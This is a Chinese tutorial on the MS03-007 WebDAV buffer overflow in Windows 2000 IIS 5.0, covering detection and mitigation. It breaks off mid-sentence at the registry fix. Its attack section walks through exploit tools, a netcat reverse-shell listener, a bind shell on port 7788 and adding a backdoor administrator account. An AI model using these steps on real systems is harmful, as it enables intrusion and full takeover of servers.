WebDAV漏洞利用及解決方案

一、 漏洞基本情況1、 漏洞名稱及描述名稱：MicrosoftWindows2000WebDAV遠(yuǎn)程緩沖區(qū)溢出漏洞微軟安全公告：MS03-007UncheckedBufferInWindowsComponentCouldCauseWebServerCompromise(815021)地址[url=/technet/security/bulletin/MS03-007.asp]鏈接標(biāo)記/technet/security/bulletin/MS03-007.asp[/url]描述：IIS5.0包含的WebDAV組件不充分檢查傳遞給部分系統(tǒng)組件的數(shù)據(jù)， 遠(yuǎn)程攻擊者利用這個(gè)漏洞對(duì)WebDAV進(jìn)行緩沖區(qū)溢出攻擊，可能以 Web進(jìn)程權(quán)限在系統(tǒng)上執(zhí)行任意指令。2、 受影響系統(tǒng)MicrosoftIIS5.0MicrosoftWindows2000Professional/Server/DatacenterServerSP3MicrosoftWindows2000Professional/Server/DatacenterServerSP2MicrosoftWindows2000Professional/Server/DatacenterServerSP1MicrosoftWindows2000Professional/Server/DatacenterServer3、 什么是WebDAV組件MicrosoftIIS5.0(InternetInformationServer5)是MicrosoftWindows2000自帶的一個(gè)網(wǎng)絡(luò)信息服務(wù)器，其中包含HTTP服務(wù)功能。IIS5默認(rèn)提供了對(duì)WebDAV的支持，WebDAV(基于Web的分布式寫作和改寫)是一組對(duì) HTTP協(xié)議的擴(kuò)展，它允許用戶協(xié)作地編輯和管理遠(yuǎn)程Web服務(wù)器上的文件。使用 WebDAV，可以通過(guò)HTTP向用戶提供遠(yuǎn)程文件存儲(chǔ)的服務(wù)，包括創(chuàng)建、移動(dòng)、復(fù)制及刪除遠(yuǎn)程服務(wù)器上的文件，但是作為普通的 HTTP服務(wù)器，這個(gè)功能不是必需的。4、 漏洞產(chǎn)生的原因這個(gè)漏洞產(chǎn)生的原因具體是由于 WebDAV使用了ntdll.dll中的一些API函數(shù)，而這些函數(shù)存在一個(gè)緩沖區(qū)溢出漏洞，而MicrosoftIIS5.0帶有WebDAV組件對(duì)用戶輸入的傳遞給 ntdll.dll程序處理的請(qǐng)求未作充分的邊界檢查，遠(yuǎn)程入侵者可以通過(guò)向 WebDAV提交一個(gè)精心構(gòu)造的超長(zhǎng)的數(shù)據(jù)請(qǐng)求而導(dǎo)致發(fā)生緩沖區(qū)溢出，成功利用這個(gè)漏洞可以獲得 LocalSystem權(quán)限，這意味著入侵者可以獲得主機(jī)的安全控制能力。所以確切地說(shuō)，這個(gè)漏洞并不是 IIS造成的，而是ntdll.dll里面的一個(gè)API函數(shù)造成的。也就是說(shuō)，很多調(diào)用這個(gè)API的應(yīng)用程序都存在這個(gè)漏洞。5、 WebDAV遠(yuǎn)程緩沖區(qū)溢出漏洞的基本情況我們這里介紹到這里了，如果讀者有興趣想進(jìn)一步了解這個(gè)漏洞具體的溢出原理分析，建議可以去百度一下詳細(xì)原因。二、如何檢測(cè)漏洞在上面介紹漏洞基本情況的時(shí)候， 我們已經(jīng)說(shuō)了IIS5.0的默認(rèn)配置是提供了對(duì) WebDAV的支持，也就是說(shuō)，如果你的 win2000提供了IIS服務(wù)而沒(méi)有打過(guò)針對(duì)此漏洞的補(bǔ)丁，那么一般情況下你的IIS就會(huì)存在這個(gè)漏洞，但如何來(lái)確定呢？我們可以借助一些工具來(lái)幫我們進(jìn)行檢測(cè)。1、第一個(gè)檢測(cè)工具：Ptwebdav.exe下載地址[url=/txt/show.php?id=10]簡(jiǎn)介：Ptwebdav.exe是一個(gè)老外寫的專門用來(lái)遠(yuǎn)程檢測(cè)Windows2000IIS5.0服務(wù)器是否存在WebDAV遠(yuǎn)程緩沖區(qū)溢出漏洞的，其操作界面非常簡(jiǎn)單，只要在其"IPorhostname"中填入要檢測(cè)的主機(jī)和IIS服務(wù)端口，然后按"check"就可以了。筆者正用它來(lái)檢測(cè)本地主機(jī)是否存在WebDAV漏洞，一會(huì)兒它就會(huì)在下面窗口里顯示結(jié)果。這個(gè)工具不錯(cuò)，但它每次只能檢測(cè)一臺(tái)機(jī)子，如果你想檢測(cè)一個(gè)網(wǎng)段內(nèi)所有主機(jī)就比較麻煩了，一臺(tái)臺(tái)地檢測(cè)不知道要檢測(cè)到什么時(shí)候。讓我們來(lái)看看第二個(gè)檢測(cè)軟件，它能幫我們解決這個(gè)問(wèn)題。2、第二個(gè)檢測(cè)工具：WebDAVScanv1.0下載地址[url=/Down/show.php?id=65&]簡(jiǎn)介：WebDAVScan是一個(gè)專門用于檢測(cè)網(wǎng)段內(nèi)的MicrosoftIIS5.0服務(wù)器是否提供了對(duì)WebDAV的支持的掃描器，軟件非常小，只有 7.23KB,而且是個(gè)綠色軟件，無(wú)須安裝，直接運(yùn)行即可！掃描后如有此安全漏洞，軟件會(huì)自動(dòng)生成掃描報(bào)告，原來(lái)也是老外寫的，不過(guò)我們這里用的是WebDAVScan的漢化版。筆者掃描X.X.23.1-X.X.23.254的網(wǎng)段大概用了30秒時(shí)間，速度很快，窗口右邊顯示的是結(jié)果， "Enable"表示了此IIS支持WebDAV，至于有沒(méi)有漏洞要看它有沒(méi)有打過(guò)補(bǔ)丁了。經(jīng)筆者測(cè)試，這個(gè)軟件確實(shí)很不錯(cuò)，推薦大家使用，好了，WebDAV的檢測(cè)也介紹完了，下面我們開(kāi)始講利用此漏洞測(cè)試攻擊了。二、漏洞測(cè)試攻擊自從WebDAV的exploit代碼出現(xiàn)后，網(wǎng)上緊接著就出現(xiàn)了好幾種版本的溢出攻擊程序，雖然其核心代碼類似，但具體的功能和操作還是有些區(qū)別的，我們這里來(lái)了解兩個(gè) WebDAV的溢出攻擊程序。1、第一個(gè)溢出程序：wb.exe下載地址[url=/txt/opensoft.asp?soft_id=131&]簡(jiǎn)介：wb.exe是一個(gè)Win32平臺(tái)下已經(jīng)編譯好的針對(duì)英文版的 IIS--webdav遠(yuǎn)程溢出攻擊程序，原代碼的作者是Crpt的kralor，使用時(shí)行用Netcat在本地監(jiān)聽(tīng)某個(gè)端口，如nc-L-p666,然后使用此程序?qū)h(yuǎn)程主機(jī)進(jìn)行溢出攻擊，溢出成功后就能在本地監(jiān)聽(tīng)口上獲取遠(yuǎn)程主機(jī)的反向連接，獲取localsystem權(quán)限的cmdshell，它需要指定遠(yuǎn)程主機(jī)反向連接主機(jī) IP、端口、補(bǔ)丁信息等參數(shù)：syntax: c:\K_WEBDAV.EXE<victim_host><your_host><your_port>[padding],如your_ip6663,攻擊如果成功,那Netcat的監(jiān)聽(tīng)窗口就會(huì)出現(xiàn)遠(yuǎn)程主機(jī)的shell。2、第二個(gè)溢出程序：webdavx.exe下載地址[url=http://www.longker.dom/txt/opensoft.asp?soft_id=135&]簡(jiǎn)介：webdavx.exe是一個(gè)針對(duì)中文版server溢出程序，它是根據(jù)安全焦點(diǎn)Isno的perl代碼編譯成的，這個(gè)版本只對(duì)中文版的有效，它的使用也不同于 wb.exe，它溢出成功后直接在目標(biāo)主機(jī)的7788端口上捆定一個(gè)localsystem權(quán)限的cmdshell,不像wb.exe需要反向連接,入侵者只要telnet到7788端口就可以了,所以用它在局域網(wǎng)內(nèi)也能對(duì)局域網(wǎng)的主機(jī)進(jìn)行攻擊，當(dāng)然wb.exe使用反向連接也有它的好處， 因?yàn)樵S多WEB服務(wù)器的防火墻都設(shè)置為只允許通過(guò)到端口80的TCP連接，這樣即使開(kāi)了7788端口你也連接不上，而使用反向連接可以突破防火墻的TCP過(guò)濾，所以這兩個(gè)軟件各有用處各有特點(diǎn)， 可以根據(jù)不同的需要進(jìn)行選擇3、測(cè)試攻擊實(shí)例雖然講了兩個(gè)攻擊軟件的用法,但都只是紙上談兵,我們還是來(lái)實(shí)際測(cè)試一下這個(gè)漏洞的威力如何！我們測(cè)試的是中文版的IIS主機(jī),使用的掃描軟件是WebDAVScan的漢化版,攻擊軟件是webdavx.exe，為了輸入方便，我把webdavx.exe改名為web.exe，在剛才介紹WebDAVScan的時(shí)候我們已經(jīng)掃描到的IIS支持WebDAV的主機(jī)中選一臺(tái)，找開(kāi) CMD,輸入：c:\web2x..x.23.68sendbuffer…（正在溢出）telnettarget7788（溢出完成，請(qǐng)嘗試telnet連接目標(biāo)主機(jī)的7788端口）c:\telnet2x..x.23.687788正在連接到2x..x.23.68…MicrosoftWindows2000[Version5.00.2195]<C>版權(quán)所有制1985-2000MicrosoftCorpc:\winnt\system32>（溢出成功，已經(jīng)連接到其 7788端口）當(dāng)然事情上溢出不一定成功，如果telnet連接提示失敗就說(shuō)明溢出可能不成功，這里是筆者N次試驗(yàn)的結(jié)果，不過(guò)現(xiàn)在webdavx.exe的溢出代碼重新進(jìn)行了改進(jìn)，其溢出成功率大幅提高，估計(jì)在1/2左右。而且得到的應(yīng)該是system權(quán)限，比超級(jí)用戶還高一級(jí)，可以加個(gè)administrator組的成員來(lái)試試：c:\winnt\system32>netuserhacker111111/addThecommandcompletedsuccessfullyC:\winnt\system32>netlocalgroupadministratorshacker/addThecommandcompletedsuccessfully命令成功了，看來(lái)System權(quán)限是真的了，那不是可在機(jī)器上干任何事情了？還真有點(diǎn)可怕！好了，我們這里只是測(cè)試，到此就停止吧！三、 漏洞消除方案我們上面已經(jīng)看到了WebDAV遠(yuǎn)程溢出攻擊的威力了吧，而到本文截稿為止，國(guó)內(nèi)網(wǎng)絡(luò)上的WebDAV遠(yuǎn)程溢出攻擊是越來(lái)越多了，你的 IIS服務(wù)器一不小心就有可能被黑客攻擊而成為被控制的傀儡，所以管理員和用戶們千萬(wàn)不能大意，一定要盡快地堵上這個(gè)漏洞，千萬(wàn)不能再重演像MSSQL的遠(yuǎn)程溢出漏洞那樣的慘痛教訓(xùn)了。具體的可以通過(guò)以下幾個(gè)方案來(lái)解決：⑴安裝補(bǔ)丁，目前微軟已經(jīng)提供了此漏洞的補(bǔ)丁，下載地址[url=/downloads/details.aspx?FamilyId=C9A38D45-5145-4844-B62E-C69D32AC929B&displaylang=en或者，你也可以作用微軟提供的 IISLockdown工具來(lái)防止該漏洞被利用。⑵如果你不能立刻安裝補(bǔ)丁或升級(jí)，也可以手工修補(bǔ)這個(gè)漏洞，我們上面已經(jīng)說(shuō)了WebDAV功能對(duì)一般的Web服務(wù)器來(lái)說(shuō)并不需要，所以可以把它停止掉。 WebDAV在IIS5.0WEB服務(wù)器上的實(shí)現(xiàn)是由Httpext.dll完成，默認(rèn)安裝，但是簡(jiǎn)單更改Httpext.ell不能修正此漏洞，因?yàn)閃INDOWS2000的WFP功能會(huì)防止系統(tǒng)重要文件破壞或刪除。要完全關(guān)閉 WebDAV包括的PUT和DELETE青求，需要對(duì)注冊(cè)表進(jìn)行如下更改：?jiǎn)?dòng)注冊(cè)表編